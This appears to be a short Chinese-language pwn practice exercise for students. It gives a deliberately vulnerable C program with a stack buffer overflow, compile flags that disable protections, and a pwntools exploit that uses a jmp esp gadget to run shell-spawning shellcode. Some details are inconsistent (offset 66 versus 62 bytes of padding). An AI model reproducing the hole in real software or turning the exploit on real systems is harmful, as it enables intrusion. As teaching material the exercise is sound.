给学弟们练手的题目,做的过程中接触一些基本概念
#include <stdio.h> #include <unistd.h> int main() { char name[40]; welcome(); printf("enter your name "); read(STDIN_FILENO, name, 40); name[39] = 'x00'; get_contents(); } void welcome() { printf("welcome to play the game! "); } void get_contents() { char contents[50]; puts("enter the contents you want to save:"); read(STDIN_FILENO, contents, 200); }
编译参数
-fno-stack-protector -z execstack -m32
题目是最简单的情况,不多加分析,下面直接给出exp
from pwn import * context(os='linux', arch='x86') #context.log_level='debug' # 0x80485e3 : jmp esp # offset: 66 jmp_esp = 0x80485e3 p = process('./a.out') #gdb.attach(p) p.sendlineafter('name ', 'a') p.sendlineafter('save: ', 'a'*62 + p32(jmp_esp) + asm(shellcraft.sh())) p.interactive()